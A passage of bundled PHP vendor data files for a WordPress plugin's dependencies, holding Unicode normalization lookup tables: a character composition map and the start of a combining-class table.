'Ȁ', 'ȁ' => 'ȁ', 'Ȃ' => 'Ȃ', 'ȃ' => 'ȃ', 'Ȅ' => 'Ȅ', 'ȅ' => 'ȅ', 'Ȇ' => 'Ȇ', 'ȇ' => 'ȇ', 'Ȉ' => 'Ȉ', 'ȉ' => 'ȉ', 'Ȋ' => 'Ȋ', 'ȋ' => 'ȋ', 'Ȍ' => 'Ȍ', 'ȍ' => 'ȍ', 'Ȏ' => 'Ȏ', 'ȏ' => 'ȏ', 'Ȑ' => 'Ȑ', 'ȑ' => 'ȑ', 'Ȓ' => 'Ȓ', 'ȓ' => 'ȓ', 'Ȕ' => 'Ȕ', 'ȕ' => 'ȕ', 'Ȗ' => 'Ȗ', 'ȗ' => 'ȗ', 'Ș' => 'Ș', 'ș' => 'ș', 'Ț' => 'Ț', 'ț' => 'ț', 'Ȟ' => 'Ȟ', 'ȟ' => 'ȟ', 'Ȧ' => 'Ȧ', 'ȧ' => 'ȧ', 'Ȩ' => 'Ȩ', 'ȩ' => 'ȩ', 'Ȫ' => 'Ȫ', 'ȫ' => 'ȫ', 'Ȭ' => 'Ȭ', 'ȭ' => 'ȭ', 'Ȯ' => 'Ȯ', 'ȯ' => 'ȯ', 'Ȱ' => 'Ȱ', 'ȱ' => 'ȱ', 'Ȳ' => 'Ȳ', 'ȳ' => 'ȳ', '΅' => '΅', 'Ά' => 'Ά', 'Έ' => 'Έ', 'Ή' => 'Ή', 'Ί' => 'Ί', 'Ό' => 'Ό', 'Ύ' => 'Ύ', 'Ώ' => 'Ώ', 'ΐ' => 'ΐ', 'Ϊ' => 'Ϊ', 'Ϋ' => 'Ϋ', 'ά' => 'ά', 'έ' => 'έ', 'ή' => 'ή', 'ί' => 'ί', 'ΰ' => 'ΰ', 'ϊ' => 'ϊ', 'ϋ' => 'ϋ', 'ό' => 'ό', 'ύ' => 'ύ', 'ώ' => 'ώ', 'ϓ' => 'ϓ', 'ϔ' => 'ϔ', 'Ѐ' => 'Ѐ', 'Ё' => 'Ё', 'Ѓ' => 'Ѓ', 'Ї' => 'Ї', 'Ќ' => 'Ќ', 'Ѝ' => 'Ѝ', 'Ў' => 'Ў', 'Й' => 'Й', 'й' => 'й', 'ѐ' => 'ѐ', 'ё' => 'ё', 'ѓ' => 'ѓ', 'ї' => 'ї', 'ќ' => 'ќ', 'ѝ' => 'ѝ', 'ў' => 'ў', 'Ѷ' => 'Ѷ', 'ѷ' => 'ѷ', 'Ӂ' => 'Ӂ', 'ӂ' => 'ӂ', 'Ӑ' => 'Ӑ', 'ӑ' => 'ӑ', 'Ӓ' => 'Ӓ', 'ӓ' => 'ӓ', 'Ӗ' => 'Ӗ', 'ӗ' => 'ӗ', 'Ӛ' => 'Ӛ', 'ӛ' => 'ӛ', 'Ӝ' => 'Ӝ', 'ӝ' => 'ӝ', 'Ӟ' => 'Ӟ', 'ӟ' => 'ӟ', 'Ӣ' => 'Ӣ', 'ӣ' => 'ӣ', 'Ӥ' => 'Ӥ', 'ӥ' => 'ӥ', 'Ӧ' => 'Ӧ', 'ӧ' => 'ӧ', 'Ӫ' => 'Ӫ', 'ӫ' => 'ӫ', 'Ӭ' => 'Ӭ', 'ӭ' => 'ӭ', 'Ӯ' => 'Ӯ', 'ӯ' => 'ӯ', 'Ӱ' => 'Ӱ', 'ӱ' => 'ӱ', 'Ӳ' => 'Ӳ', 'ӳ' => 'ӳ', 'Ӵ' => 'Ӵ', 'ӵ' => 'ӵ', 'Ӹ' => 'Ӹ', 'ӹ' => 'ӹ', 'آ' => 'آ', 'أ' => 'أ', 'ؤ' => 'ؤ', 'إ' => 'إ', 'ئ' => 'ئ', 'ۀ' => 'ۀ', 'ۂ' => 'ۂ', 'ۓ' => 'ۓ', 'ऩ' => 'ऩ', 'ऱ' => 'ऱ', 'ऴ' => 'ऴ', 'ো' => 'ো', 'ৌ' => 'ৌ', 'ୈ' => 'ୈ', 'ୋ' => 'ୋ', 'ୌ' => 'ୌ', 'ஔ' => 'ஔ', 'ொ' => 'ொ', 'ோ' => 'ோ', 'ௌ' => 'ௌ', 'ై' => 'ై', 'ೀ' => 'ೀ', 'ೇ' => 'ೇ', 'ೈ' => 'ೈ', 'ೊ' => 'ೊ', 'ೋ' => 'ೋ', 'ൊ' => 'ൊ', 'ോ' => 'ോ', 'ൌ' => 'ൌ', 'ේ' => 'ේ', 'ො' => 'ො', 'ෝ' => 'ෝ', 'ෞ' => 'ෞ', 'ဦ' => 'ဦ', 'ᬆ' => 'ᬆ', 'ᬈ' => 'ᬈ', 'ᬊ' => 'ᬊ', 'ᬌ' => 'ᬌ', 'ᬎ' => 'ᬎ', 'ᬒ' => 'ᬒ', 'ᬻ' => 'ᬻ', 'ᬽ' => 'ᬽ', 'ᭀ' => 'ᭀ', 'ᭁ' => 'ᭁ', 'ᭃ' => 'ᭃ', 'Ḁ' => 'Ḁ', 'ḁ' => 'ḁ', 'Ḃ' => 'Ḃ', 'ḃ' => 'ḃ', 'Ḅ' => 'Ḅ', 'ḅ' => 'ḅ', 'Ḇ' => 'Ḇ', 'ḇ' => 'ḇ', 'Ḉ' => 'Ḉ', 'ḉ' => 'ḉ', 'Ḋ' => 'Ḋ', 'ḋ' => 'ḋ', 'Ḍ' => 'Ḍ', 'ḍ' => 'ḍ', 'Ḏ' => 'Ḏ', 'ḏ' => 'ḏ', 'Ḑ' => 'Ḑ', 'ḑ' => 'ḑ', 'Ḓ' => 'Ḓ', 'ḓ' => 'ḓ', 'Ḕ' => 'Ḕ', 'ḕ' => 'ḕ', 'Ḗ' => 'Ḗ', 'ḗ' => 'ḗ', 'Ḙ' => 'Ḙ', 'ḙ' => 'ḙ', 'Ḛ' => 'Ḛ', 'ḛ' => 'ḛ', 'Ḝ' => 'Ḝ', 'ḝ' => 'ḝ', 'Ḟ' => 'Ḟ', 'ḟ' => 'ḟ', 'Ḡ' => 'Ḡ', 'ḡ' => 'ḡ', 'Ḣ' => 'Ḣ', 'ḣ' => 'ḣ', 'Ḥ' => 'Ḥ', 'ḥ' => 'ḥ', 'Ḧ' => 'Ḧ', 'ḧ' => 'ḧ', 'Ḩ' => 'Ḩ', 'ḩ' => 'ḩ', 'Ḫ' => 'Ḫ', 'ḫ' => 'ḫ', 'Ḭ' => 'Ḭ', 'ḭ' => 'ḭ', 'Ḯ' => 'Ḯ', 'ḯ' => 'ḯ', 'Ḱ' => 'Ḱ', 'ḱ' => 'ḱ', 'Ḳ' => 'Ḳ', 'ḳ' => 'ḳ', 'Ḵ' => 'Ḵ', 'ḵ' => 'ḵ', 'Ḷ' => 'Ḷ', 'ḷ' => 'ḷ', 'Ḹ' => 'Ḹ', 'ḹ' => 'ḹ', 'Ḻ' => 'Ḻ', 'ḻ' => 'ḻ', 'Ḽ' => 'Ḽ', 'ḽ' => 'ḽ', 'Ḿ' => 'Ḿ', 'ḿ' => 'ḿ', 'Ṁ' => 'Ṁ', 'ṁ' => 'ṁ', 'Ṃ' => 'Ṃ', 'ṃ' => 'ṃ', 'Ṅ' => 'Ṅ', 'ṅ' => 'ṅ', 'Ṇ' => 'Ṇ', 'ṇ' => 'ṇ', 'Ṉ' => 'Ṉ', 'ṉ' => 'ṉ', 'Ṋ' => 'Ṋ', 'ṋ' => 'ṋ', 'Ṍ' => 'Ṍ', 'ṍ' => 'ṍ', 'Ṏ' => 'Ṏ', 'ṏ' => 'ṏ', 'Ṑ' => 'Ṑ', 'ṑ' => 'ṑ', 'Ṓ' => 'Ṓ', 'ṓ' => 'ṓ', 'Ṕ' => 'Ṕ', 'ṕ' => 'ṕ', 'Ṗ' => 'Ṗ', 'ṗ' => 'ṗ', 'Ṙ' => 'Ṙ', 'ṙ' => 'ṙ', 'Ṛ' => 'Ṛ', 'ṛ' => 'ṛ', 'Ṝ' => 'Ṝ', 'ṝ' => 'ṝ', 'Ṟ' => 'Ṟ', 'ṟ' => 'ṟ', 'Ṡ' => 'Ṡ', 'ṡ' => 'ṡ', 'Ṣ' => 'Ṣ', 'ṣ' => 'ṣ', 'Ṥ' => 'Ṥ', 'ṥ' => 'ṥ', 'Ṧ' => 'Ṧ', 'ṧ' => 'ṧ', 'Ṩ' => 'Ṩ', 'ṩ' => 'ṩ', 'Ṫ' => 'Ṫ', 'ṫ' => 'ṫ', 'Ṭ' => 'Ṭ', 'ṭ' => 'ṭ', 'Ṯ' => 'Ṯ', 'ṯ' => 'ṯ', 'Ṱ' => 'Ṱ', 'ṱ' => 'ṱ', 'Ṳ' => 'Ṳ', 'ṳ' => 'ṳ', 'Ṵ' => 'Ṵ', 'ṵ' => 'ṵ', 'Ṷ' => 'Ṷ', 'ṷ' => 'ṷ', 'Ṹ' => 'Ṹ', 'ṹ' => 'ṹ', 'Ṻ' => 'Ṻ', 'ṻ' => 'ṻ', 'Ṽ' => 'Ṽ', 'ṽ' => 'ṽ', 'Ṿ' => 'Ṿ', 'ṿ' => 'ṿ', 'Ẁ' => 'Ẁ', 'ẁ' => 'ẁ', 'Ẃ' => 'Ẃ', 'ẃ' => 'ẃ', 'Ẅ' => 'Ẅ', 'ẅ' => 'ẅ', 'Ẇ' => 'Ẇ', 'ẇ' => 'ẇ', 'Ẉ' => 'Ẉ', 'ẉ' => 'ẉ', 'Ẋ' => 'Ẋ', 'ẋ' => 'ẋ', 'Ẍ' => 'Ẍ', 'ẍ' => 'ẍ', 'Ẏ' => 'Ẏ', 'ẏ' => 'ẏ', 'Ẑ' => 'Ẑ', 'ẑ' => 'ẑ', 'Ẓ' => 'Ẓ', 'ẓ' => 'ẓ', 'Ẕ' => 'Ẕ', 'ẕ' => 'ẕ', 'ẖ' => 'ẖ', 'ẗ' => 'ẗ', 'ẘ' => 'ẘ', 'ẙ' => 'ẙ', 'ẛ' => 'ẛ', 'Ạ' => 'Ạ', 'ạ' => 'ạ', 'Ả' => 'Ả', 'ả' => 'ả', 'Ấ' => 'Ấ', 'ấ' => 'ấ', 'Ầ' => 'Ầ', 'ầ' => 'ầ', 'Ẩ' => 'Ẩ', 'ẩ' => 'ẩ', 'Ẫ' => 'Ẫ', 'ẫ' => 'ẫ', 'Ậ' => 'Ậ', 'ậ' => 'ậ', 'Ắ' => 'Ắ', 'ắ' => 'ắ', 'Ằ' => 'Ằ', 'ằ' => 'ằ', 'Ẳ' => 'Ẳ', 'ẳ' => 'ẳ', 'Ẵ' => 'Ẵ', 'ẵ' => 'ẵ', 'Ặ' => 'Ặ', 'ặ' => 'ặ', 'Ẹ' => 'Ẹ', 'ẹ' => 'ẹ', 'Ẻ' => 'Ẻ', 'ẻ' => 'ẻ', 'Ẽ' => 'Ẽ', 'ẽ' => 'ẽ', 'Ế' => 'Ế', 'ế' => 'ế', 'Ề' => 'Ề', 'ề' => 'ề', 'Ể' => 'Ể', 'ể' => 'ể', 'Ễ' => 'Ễ', 'ễ' => 'ễ', 'Ệ' => 'Ệ', 'ệ' => 'ệ', 'Ỉ' => 'Ỉ', 'ỉ' => 'ỉ', 'Ị' => 'Ị', 'ị' => 'ị', 'Ọ' => 'Ọ', 'ọ' => 'ọ', 'Ỏ' => 'Ỏ', 'ỏ' => 'ỏ', 'Ố' => 'Ố', 'ố' => 'ố', 'Ồ' => 'Ồ', 'ồ' => 'ồ', 'Ổ' => 'Ổ', 'ổ' => 'ổ', 'Ỗ' => 'Ỗ', 'ỗ' => 'ỗ', 'Ộ' => 'Ộ', 'ộ' => 'ộ', 'Ớ' => 'Ớ', 'ớ' => 'ớ', 'Ờ' => 'Ờ', 'ờ' => 'ờ', 'Ở' => 'Ở', 'ở' => 'ở', 'Ỡ' => 'Ỡ', 'ỡ' => 'ỡ', 'Ợ' => 'Ợ', 'ợ' => 'ợ', 'Ụ' => 'Ụ', 'ụ' => 'ụ', 'Ủ' => 'Ủ', 'ủ' => 'ủ', 'Ứ' => 'Ứ', 'ứ' => 'ứ', 'Ừ' => 'Ừ', 'ừ' => 'ừ', 'Ử' => 'Ử', 'ử' => 'ử', 'Ữ' => 'Ữ', 'ữ' => 'ữ', 'Ự' => 'Ự', 'ự' => 'ự', 'Ỳ' => 'Ỳ', 'ỳ' => 'ỳ', 'Ỵ' => 'Ỵ', 'ỵ' => 'ỵ', 'Ỷ' => 'Ỷ', 'ỷ' => 'ỷ', 'Ỹ' => 'Ỹ', 'ỹ' => 'ỹ', 'ἀ' => 'ἀ', 'ἁ' => 'ἁ', 'ἂ' => 'ἂ', 'ἃ' => 'ἃ', 'ἄ' => 'ἄ', 'ἅ' => 'ἅ', 'ἆ' => 'ἆ', 'ἇ' => 'ἇ', 'Ἀ' => 'Ἀ', 'Ἁ' => 'Ἁ', 'Ἂ' => 'Ἂ', 'Ἃ' => 'Ἃ', 'Ἄ' => 'Ἄ', 'Ἅ' => 'Ἅ', 'Ἆ' => 'Ἆ', 'Ἇ' => 'Ἇ', 'ἐ' => 'ἐ', 'ἑ' => 'ἑ', 'ἒ' => 'ἒ', 'ἓ' => 'ἓ', 'ἔ' => 'ἔ', 'ἕ' => 'ἕ', 'Ἐ' => 'Ἐ', 'Ἑ' => 'Ἑ', 'Ἒ' => 'Ἒ', 'Ἓ' => 'Ἓ', 'Ἔ' => 'Ἔ', 'Ἕ' => 'Ἕ', 'ἠ' => 'ἠ', 'ἡ' => 'ἡ', 'ἢ' => 'ἢ', 'ἣ' => 'ἣ', 'ἤ' => 'ἤ', 'ἥ' => 'ἥ', 'ἦ' => 'ἦ', 'ἧ' => 'ἧ', 'Ἠ' => 'Ἠ', 'Ἡ' => 'Ἡ', 'Ἢ' => 'Ἢ', 'Ἣ' => 'Ἣ', 'Ἤ' => 'Ἤ', 'Ἥ' => 'Ἥ', 'Ἦ' => 'Ἦ', 'Ἧ' => 'Ἧ', 'ἰ' => 'ἰ', 'ἱ' => 'ἱ', 'ἲ' => 'ἲ', 'ἳ' => 'ἳ', 'ἴ' => 'ἴ', 'ἵ' => 'ἵ', 'ἶ' => 'ἶ', 'ἷ' => 'ἷ', 'Ἰ' => 'Ἰ', 'Ἱ' => 'Ἱ', 'Ἲ' => 'Ἲ', 'Ἳ' => 'Ἳ', 'Ἴ' => 'Ἴ', 'Ἵ' => 'Ἵ', 'Ἶ' => 'Ἶ', 'Ἷ' => 'Ἷ', 'ὀ' => 'ὀ', 'ὁ' => 'ὁ', 'ὂ' => 'ὂ', 'ὃ' => 'ὃ', 'ὄ' => 'ὄ', 'ὅ' => 'ὅ', 'Ὀ' => 'Ὀ', 'Ὁ' => 'Ὁ', 'Ὂ' => 'Ὂ', 'Ὃ' => 'Ὃ', 'Ὄ' => 'Ὄ', 'Ὅ' => 'Ὅ', 'ὐ' => 'ὐ', 'ὑ' => 'ὑ', 'ὒ' => 'ὒ', 'ὓ' => 'ὓ', 'ὔ' => 'ὔ', 'ὕ' => 'ὕ', 'ὖ' => 'ὖ', 'ὗ' => 'ὗ', 'Ὑ' => 'Ὑ', 'Ὓ' => 'Ὓ', 'Ὕ' => 'Ὕ', 'Ὗ' => 'Ὗ', 'ὠ' => 'ὠ', 'ὡ' => 'ὡ', 'ὢ' => 'ὢ', 'ὣ' => 'ὣ', 'ὤ' => 'ὤ', 'ὥ' => 'ὥ', 'ὦ' => 'ὦ', 'ὧ' => 'ὧ', 'Ὠ' => 'Ὠ', 'Ὡ' => 'Ὡ', 'Ὢ' => 'Ὢ', 'Ὣ' => 'Ὣ', 'Ὤ' => 'Ὤ', 'Ὥ' => 'Ὥ', 'Ὦ' => 'Ὦ', 'Ὧ' => 'Ὧ', 'ὰ' => 'ὰ', 'ὲ' => 'ὲ', 'ὴ' => 'ὴ', 'ὶ' => 'ὶ', 'ὸ' => 'ὸ', 'ὺ' => 'ὺ', 'ὼ' => 'ὼ', 'ᾀ' => 'ᾀ', 'ᾁ' => 'ᾁ', 'ᾂ' => 'ᾂ', 'ᾃ' => 'ᾃ', 'ᾄ' => 'ᾄ', 'ᾅ' => 'ᾅ', 'ᾆ' => 'ᾆ', 'ᾇ' => 'ᾇ', 'ᾈ' => 'ᾈ', 'ᾉ' => 'ᾉ', 'ᾊ' => 'ᾊ', 'ᾋ' => 'ᾋ', 'ᾌ' => 'ᾌ', 'ᾍ' => 'ᾍ', 'ᾎ' => 'ᾎ', 'ᾏ' => 'ᾏ', 'ᾐ' => 'ᾐ', 'ᾑ' => 'ᾑ', 'ᾒ' => 'ᾒ', 'ᾓ' => 'ᾓ', 'ᾔ' => 'ᾔ', 'ᾕ' => 'ᾕ', 'ᾖ' => 'ᾖ', 'ᾗ' => 'ᾗ', 'ᾘ' => 'ᾘ', 'ᾙ' => 'ᾙ', 'ᾚ' => 'ᾚ', 'ᾛ' => 'ᾛ', 'ᾜ' => 'ᾜ', 'ᾝ' => 'ᾝ', 'ᾞ' => 'ᾞ', 'ᾟ' => 'ᾟ', 'ᾠ' => 'ᾠ', 'ᾡ' => 'ᾡ', 'ᾢ' => 'ᾢ', 'ᾣ' => 'ᾣ', 'ᾤ' => 'ᾤ', 'ᾥ' => 'ᾥ', 'ᾦ' => 'ᾦ', 'ᾧ' => 'ᾧ', 'ᾨ' => 'ᾨ', 'ᾩ' => 'ᾩ', 'ᾪ' => 'ᾪ', 'ᾫ' => 'ᾫ', 'ᾬ' => 'ᾬ', 'ᾭ' => 'ᾭ', 'ᾮ' => 'ᾮ', 'ᾯ' => 'ᾯ', 'ᾰ' => 'ᾰ', 'ᾱ' => 'ᾱ', 'ᾲ' => 'ᾲ', 'ᾳ' => 'ᾳ', 'ᾴ' => 'ᾴ', 'ᾶ' => 'ᾶ', 'ᾷ' => 'ᾷ', 'Ᾰ' => 'Ᾰ', 'Ᾱ' => 'Ᾱ', 'Ὰ' => 'Ὰ', 'ᾼ' => 'ᾼ', '῁' => '῁', 'ῂ' => 'ῂ', 'ῃ' => 'ῃ', 'ῄ' => 'ῄ', 'ῆ' => 'ῆ', 'ῇ' => 'ῇ', 'Ὲ' => 'Ὲ', 'Ὴ' => 'Ὴ', 'ῌ' => 'ῌ', '῍' => '῍', '῎' => '῎', '῏' => '῏', 'ῐ' => 'ῐ', 'ῑ' => 'ῑ', 'ῒ' => 'ῒ', 'ῖ' => 'ῖ', 'ῗ' => 'ῗ', 'Ῐ' => 'Ῐ', 'Ῑ' => 'Ῑ', 'Ὶ' => 'Ὶ', '῝' => '῝', '῞' => '῞', '῟' => '῟', 'ῠ' => 'ῠ', 'ῡ' => 'ῡ', 'ῢ' => 'ῢ', 'ῤ' => 'ῤ', 'ῥ' => 'ῥ', 'ῦ' => 'ῦ', 'ῧ' => 'ῧ', 'Ῠ' => 'Ῠ', 'Ῡ' => 'Ῡ', 'Ὺ' => 'Ὺ', 'Ῥ' => 'Ῥ', '῭' => '῭', 'ῲ' => 'ῲ', 'ῳ' => 'ῳ', 'ῴ' => 'ῴ', 'ῶ' => 'ῶ', 'ῷ' => 'ῷ', 'Ὸ' => 'Ὸ', 'Ὼ' => 'Ὼ', 'ῼ' => 'ῼ', '↚' => '↚', '↛' => '↛', '↮' => '↮', '⇍' => '⇍', '⇎' => '⇎', '⇏' => '⇏', '∄' => '∄', '∉' => '∉', '∌' => '∌', '∤' => '∤', '∦' => '∦', '≁' => '≁', '≄' => '≄', '≇' => '≇', '≉' => '≉', '≠' => '≠', '≢' => '≢', '≭' => '≭', '≮' => '≮', '≯' => '≯', '≰' => '≰', '≱' => '≱', '≴' => '≴', '≵' => '≵', '≸' => '≸', '≹' => '≹', '⊀' => '⊀', '⊁' => '⊁', '⊄' => '⊄', '⊅' => '⊅', '⊈' => '⊈', '⊉' => '⊉', '⊬' => '⊬', '⊭' => '⊭', '⊮' => '⊮', '⊯' => '⊯', '⋠' => '⋠', '⋡' => '⋡', '⋢' => '⋢', '⋣' => '⋣', '⋪' => '⋪', '⋫' => '⋫', '⋬' => '⋬', '⋭' => '⋭', 'が' => 'が', 'ぎ' => 'ぎ', 'ぐ' => 'ぐ', 'げ' => 'げ', 'ご' => 'ご', 'ざ' => 'ざ', 'じ' => 'じ', 'ず' => 'ず', 'ぜ' => 'ぜ', 'ぞ' => 'ぞ', 'だ' => 'だ', 'ぢ' => 'ぢ', 'づ' => 'づ', 'で' => 'で', 'ど' => 'ど', 'ば' => 'ば', 'ぱ' => 'ぱ', 'び' => 'び', 'ぴ' => 'ぴ', 'ぶ' => 'ぶ', 'ぷ' => 'ぷ', 'べ' => 'べ', 'ぺ' => 'ぺ', 'ぼ' => 'ぼ', 'ぽ' => 'ぽ', 'ゔ' => 'ゔ', 'ゞ' => 'ゞ', 'ガ' => 'ガ', 'ギ' => 'ギ', 'グ' => 'グ', 'ゲ' => 'ゲ', 'ゴ' => 'ゴ', 'ザ' => 'ザ', 'ジ' => 'ジ', 'ズ' => 'ズ', 'ゼ' => 'ゼ', 'ゾ' => 'ゾ', 'ダ' => 'ダ', 'ヂ' => 'ヂ', 'ヅ' => 'ヅ', 'デ' => 'デ', 'ド' => 'ド', 'バ' => 'バ', 'パ' => 'パ', 'ビ' => 'ビ', 'ピ' => 'ピ', 'ブ' => 'ブ', 'プ' => 'プ', 'ベ' => 'ベ', 'ペ' => 'ペ', 'ボ' => 'ボ', 'ポ' => 'ポ', 'ヴ' => 'ヴ', 'ヷ' => 'ヷ', 'ヸ' => 'ヸ', 'ヹ' => 'ヹ', 'ヺ' => 'ヺ', 'ヾ' => 'ヾ', '𑂚' => '𑂚', '𑂜' => '𑂜', '𑂫' => '𑂫', '𑄮' => '𑄮', '𑄯' => '𑄯', '𑍋' => '𑍋', '𑍌' => '𑍌', '𑒻' => '𑒻', '𑒼' => '𑒼', '𑒾' => '𑒾', '𑖺' => '𑖺', '𑖻' => '𑖻', '𑤸' => '𑤸'); <?php namespace Google\Site_Kit_Dependencies; return array('̀' => 230, '́' => 230, '̂' => 230, '̃' => 230, '̄' => 230, '̅' => 230, '̆' => 230, '̇' => 230, '̈' => 230, '̉' => 230, '̊' => 230, '̋' => 230, '̌' => 230, '̍' => 230, '̎' => 230, '̏' => 230, '̐' => 230, '̑' => 230, '̒' => 230, '̓' => 230, '̔' => 230, '̕' => 232, '̖' => 220, '̗' => 220, '̘' => 220, '̙' => 220, '̚' => 232, '̛' => 216, '̜' => 220, '̝' => 220, '̞' => 220, '̟' => 220, '̠' => 220, '̡' => 202, '̢' => 202, '̣' => 220, '̤' => 220, '̥' => 220, '̦' => 220, '̧' => 202, '̨' => 202, '̩' => 220, '̪' => 220, '̫' => 220, '̬' => 220, '̭' => 220, '̮' => 220, '̯' => 220, '̰' => 220, '̱' => 220, '̲' => 220, '̳' => 220, '̴' => 1, '̵' => 1, '̶' => 1, '̷' => 1, '̸' => 1, '̹' => 220, '̺' => 220, '̻' => 220, '̼' => 220, '̽' => 230, '̾' => 230, '̿' => 230, '̀' => 230, '́' => 230, '͂' => 230, '̓' => 230, '̈́' => 230, 'ͅ' => 240, '͆' => 230, '͇' => 220, '͈' => 220, '͉' => 220, '͊' => 230, '͋' => 230, '͌' => 230, '͍' => 220, '͎' => 220, '͐' => 230, '͑' => 230, '͒' => 230, '͓' => 220, '͔' => 220, '͕' => 220, '͖' => 220, '͗' => 230, '͘' => 232, '͙' => 220, '͚' => 220, '͛' => 230, '͜' => 233, '͝' => 234, '͞' => 234, '͟' => 233, '͠' => 234, '͡' => 234, '͢' => 233, 'ͣ' => 230, 'ͤ' => 230, 'ͥ' => 230, 'ͦ' => 230, 'ͧ' => 230, 'ͨ' => 230, 'ͩ' => 230, 'ͪ' => 230, 'ͫ' => 230, 'ͬ' => 230, 'ͭ' => 230, 'ͮ' => 230, 'ͯ' => 230, '҃' => 230, '҄' => 230, '҅' => 230, '҆' => 230, '҇' => 230, '֑' => 220, '֒' => 230, '֓' => 230, '֔' => 230, '֕' => 230, '֖' => 220, '֗' => 230, '֘' => 230, '֙' => 230, '֚' => 222, '֛' => 220, '֜' => 230, '֝' => 230, '֞' => 230, '֟' => 230, '֠' => 230, '֡' => 230, '֢' => 220, '֣' => 220, '֤' => 220, '֥' => 220, '֦' => 220, '֧' => 220, '֨' => 230, '֩' => 230, '֪' => 220, '֫' => 230, '֬' => 230, '֭' => 222, '֮' => 228, '֯' => 230, 'ְ' => 10, 'ֱ' => 11, 'ֲ' => 12, 'ֳ' => 13, 'ִ' => 14, 'ֵ' => 15, 'ֶ' => 16, 'ַ' => 17, 'ָ' => 18, 'ֹ' => 19, 'ֺ' => 19, 'ֻ' => 20, 'ּ' => 21, 'ֽ' => 22, 'ֿ' => 23, 'ׁ' => 24, 'ׂ' => 25, 'ׄ' => 230, 'ׅ' => 220, 'ׇ' => 18, 'ؐ' => 230, 'ؑ' => 230, 'ؒ' => 230, 'ؓ' => 230, 'ؔ' => 230, 'ؕ' => 230, 'ؖ' => 230, 'ؗ' => 230, 'ؘ' => 30, 'ؙ' => 31, 'ؚ' => 32, 'ً' => 27, 'ٌ' => 28, 'ٍ' => 29, 'َ' => 30, 'ُ' => 31, 'ِ' => 32, 'ّ' => 33, 'ْ' => 34, 'ٓ' => 230, 'ٔ' => 230, 'ٕ' => 220, 'ٖ' => 220, 'ٗ' => 230, '٘' => 230, 'ٙ' => 230, 'ٚ' => 230, 'ٛ' => 230, 'ٜ' => 220, 'ٝ' => 230, 'ٞ' => 230, 'ٟ' => 220, 'ٰ' => 35, 'ۖ' => 230, 'ۗ' => 230, 'ۘ' => 230, 'ۙ' => 230, 'ۚ' => 230, 'ۛ' => 230, 'ۜ' => 230, '۟' => 230, '۠' => 230, 'ۡ' => 230, 'ۢ' => 230, 'ۣ' => 220, 'ۤ' => 230, 'ۧ' => 230, 'ۨ' => 230, '۪' => 220, '۫' => 230, '۬' => 230, 'ۭ' => 220, 'ܑ' => 36, 'ܰ' => 230, 'ܱ' => 220, 'ܲ' => 230, 'ܳ' => 230, 'ܴ' => 220, 'ܵ' => 230, 'ܶ' => 230, 'ܷ' => 220, 'ܸ' => 220, 'ܹ' => 220, 'ܺ' => 230, 'ܻ' => 220, 'ܼ' => 220, 'ܽ' => 230, 'ܾ' => 220, 'ܿ' => 230, '݀' => 230, '݁' => 230, '݂' => 220, '݃' => 230, '݄' => 220, '݅' => 230, '݆' => 220, '݇' => 230, '݈' => 220, '݉' => 230, '݊' => 230, '߫' => 230, '߬' => 230, '߭' => 230, '߮' => 230, '߯' => 230, '߰' => 230, '߱' => 230, '߲' => 220, '߳' => 230, '߽' => 220, 'ࠖ' => 230, 'ࠗ' => 230, '࠘' => 230, '࠙' => 230, 'ࠛ' => 230, 'ࠜ' => 230, 'ࠝ' => 230, 'ࠞ' => 230, 'ࠟ' => 230, 'ࠠ' => 230, 'ࠡ' => 230, 'ࠢ' => 230, 'ࠣ' => 230, 'ࠥ' => 230, 'ࠦ' => 230, 'ࠧ' => 230, 'ࠩ' => 230, 'ࠪ' => 230, 'ࠫ' => 230, 'ࠬ' => 230, '࠭' => 230, '࡙' => 220, '࡚' => 220, '࡛' => 220, '࣓' => 220, 'ࣔ' => 230, 'ࣕ' => 230, 'ࣖ' => 230, 'ࣗ' => 230, 'ࣘ' => 230, 'ࣙ' => 230, 'ࣚ' => 230, 'ࣛ' => 230, 'ࣜ' => 230, 'ࣝ' => 230, 'ࣞ' => 230, 'ࣟ' => 230, '࣠' => 230, '࣡' => 230, 'ࣣ' => 220, 'ࣤ' => 230, 'ࣥ' => 230, 'ࣦ' => 220, 'ࣧ' => 230, 'ࣨ' => 230, 'ࣩ' => 220, '࣪' => 230, '࣫' => 230, '࣬' => 230, '࣭' => 220, '࣮' => 220, '࣯' => 220, 'ࣰ' => 27, 'ࣱ' => 28, 'ࣲ' => 29, 'ࣳ' => 230, 'ࣴ' => 230, 'ࣵ' => 230, 'ࣶ' => 220, 'ࣷ' => 230, 'ࣸ' => 230, 'ࣹ' => 220, 'ࣺ' => 220, 'ࣻ' => 230, 'ࣼ' => 230, 'ࣽ' => 230, 'ࣾ' => 230, 'ࣿ' => 230, '़' => 7, '्' => 9, '॑' => 230, '॒' => 220, '॓' => 230, '॔' => 230, '়' => 7, '্' => 9, '৾' => 230, '਼' => 7, '੍' => 9, '઼' => 7, '્' => 9, '଼' => 7, '୍' => 9, '்' => 9, '్' => 9, 'ౕ' => 84, 'ౖ' => 91, '಼' => 7, '್' => 9, '഻' => 9, '഼' => 9, '്' => 9, '්' => 9, 'ุ' => 103, 'ู' => 103, 'ฺ' => 9, '่' => 107, '้' => 107, '๊' => 107, '๋' => 107, 'ຸ' => 118, 'ູ' => 118, '຺' => 9, '່' => 122, '້' => 122, '໊' => 122, '໋' => 122, '༘' => 220, '༙' => 220, '༵' => 220, '༷' => 220, '༹' => 216, 'ཱ' => 129, 'ི' => 130, 'ུ' => 132, 'ེ' => 130, 'ཻ' => 130, 'ོ' => 130, 'ཽ' => 130, 'ྀ' => 130, 'ྂ' => 230, 'ྃ' => 230, '྄' => 9, '྆' => 230, '྇' => 230, '࿆' => 220, '့' => 7, '္' => 9, '်' => 9, 'ႍ' => 220, '፝' => 230, '፞' => 230, '፟' => 230, '᜔' => 9, '᜴' => 9, '្' => 9, '៝' => 230, 'ᢩ' => 228, '᤹' => 222, '᤺' => 230, '᤻' => 220, 'ᨗ' => 230, 'ᨘ' => 220, '᩠' => 9, '᩵' => 230, '᩶' => 230, '᩷' => 230, '᩸' => 230, '᩹' => 230, '᩺' => 230, '᩻' => 230, '᩼' => 230, '᩿' => 220, '᪰' => 230, '᪱' => 230, '᪲' => 230, '᪳' => 230, '᪴' => 230, '᪵' => 220, '᪶' => 220, '᪷' => 220, '᪸' => 220, '᪹' => 220, '᪺' => 220, '᪻' => 230, '᪼' => 230, '᪽' => 220, 'ᪿ' => 220, 'ᫀ' => 220, '᬴' => 7, '᭄' => 9, '᭫' => 230, '᭬' => 220, '᭭' => 230, '᭮' => 230, '᭯' => 230, '᭰' => 230, '᭱' => 230, '᭲' 